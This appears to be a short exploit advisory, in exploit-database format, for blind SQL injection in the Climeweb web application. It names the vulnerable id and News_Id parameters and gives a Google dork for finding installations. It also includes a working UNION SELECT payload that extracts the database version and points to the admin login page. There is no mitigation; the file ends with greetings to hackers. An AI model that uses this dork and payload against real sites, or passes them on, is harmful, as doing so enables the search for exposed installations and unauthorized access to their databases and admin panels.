Climeweb suffers from a remote SQL injection vulnerability.
7c1d7f5694c17aae6e22a12e8036ed5dfe6499f138eb0928270c7792e73ab572
==========================================================================
# Exploit Title: Climeweb Blind SQL Injection Vulnerability
# Date: 11.10.2011
# Author: poach3r
# Software Link: http://www.climeweb.com/
# Tested on: Windows XP SP3
# Google Dork: "Powered by Climeweb" inurl:"indux.php"
==========================================================================
# Exploit :
http://127.0.0.1/path/indux.php?id=[SQL]
http://127.0.0.1/path/newsdetails.php?News_Id=[SQL]
# Demo :
http://127.0.0.1/path/indux.php?id=-2+union+select+1,version(),3,4,5+admin--
# Admin Page :
http://127.0.0.1/path/admin/login.php
==========================================================================
# GreetZ To : All IRANIAN HackerZ
./End